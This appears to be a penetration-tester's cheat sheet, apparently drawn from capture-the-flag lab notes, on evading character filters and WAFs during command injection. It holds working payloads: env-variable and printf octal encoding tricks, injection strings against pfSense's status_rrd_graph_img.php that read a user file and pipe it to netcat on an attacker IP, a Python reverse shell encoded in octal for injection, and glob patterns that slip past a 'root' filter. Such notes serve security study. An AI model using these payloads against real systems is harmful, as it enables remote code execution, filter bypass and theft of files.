# Char Evasion Tricks

## REF:

* [PFSense](https://pentest.mxhx.org/04-webapps/pfsense#exec-code-exploit), [LFI](https://pentest.mxhx.org/04-webapps/lfi), [WAF](https://pentest.mxhx.org/04-webapps/03-webapp-waf)

## env

* Scenario: blocked / and -
* We can use **env** to grab a char we need

```
> env
HOME=/
LANG=en_US.ISO8559-1

cat ${HOME}         ..slash
cat ${LANG:14:1}    ..dash (wont work in bsd/pfsense)

LFI Example:
..queues;cat+${HOME}home${HOME}rohit${HOME}user.txt|nc+10.10.14.6+4444
nc -nvlp 4444
```

## hex

* **printf hex** (linux)
* Doesnt work in bsd

```
man ascii           .. ascii table
printf "\x41"       .. Hex Char = A
```

## octal

* **printf octal** (bsd)

```
man ascii              .. find octal in ascii table
printf "\56"           .. period
printf "\55"           .. dash

Example:
echo $(printf "\55")   .. result:  -
wc -c /home/user.txt
wc+$(printf+"\55")c+/home/user.txt

Send to nc
..queues;wc+$(printf+"\55")c+${HOME}home${HOME}rohit${HOME}user.txt|nc+10.10.14.6+9000
nc -nvlp 9001
```

## octal python

* Straight from [pfsense](https://pentest.mxhx.org/04-webapps/pfsense#send-octal-code-to-injection)

```
#!/usr/bin/env python3
command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.10',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'"
payload = ""
for char in command:
	payload += ("\\" + oct(ord(char)).lstrip("0o"))
print(payload)


\160\171\164\150\...              ..result
printf '\160\171\164\150\...'     ..verify

Inject:
https://10.x.x.x/status_rrd_graph_img.php?database=queues;printf+%27\160\171\164\150\...%27|sh
```

## spaces

* REF: [WAF](https://pentest.mxhx.org/04-webapps/03-webapp-waf#char-evasion-spaces)

```
{ls,-la,/root}
{cat,file.txt}
cat${IFS}file.txt

/&pwd/&pwd
/var/task&{cat,secret.py}

{/var/log/,-la}
/var/log&{cat,yum.log}
/var/log&{ls,//var/log/yum.log}
/&{cat,/var/log/yum.log}
/&{ls,-la,/home/target/}

Found this hiding behind ...  instead of . ..
{/var/task/...,-la}
```

## Avoid 'root' Filter with Splatting

* REF: [PrivEscBinaries](https://pentest.mxhx.org/06-linux-privesc/binaries), nodeHTB

```
----------------
Root Blocked
echo 'hello' > /tmp/root    ..decode/unzip/cat  ..fail
echo 'hello' > /tmp/*r00t   ..decode/unzip/cat  ..success

----------------
Splatting:
.backup -q secretkey /r**t/r**t.txt > root.txt
base64 -d root.txt > /tmp/secret
unzip secret
cat root/root.txt  ..success

myapp -q secretkey /r**t/r**t.txt > /tmp/encoded
myapp -q secretkey /r??t/roo?.txt > /tmp/encoded
myapp -q secretkey /r*t/r*t.txt > /tmp/encoded
```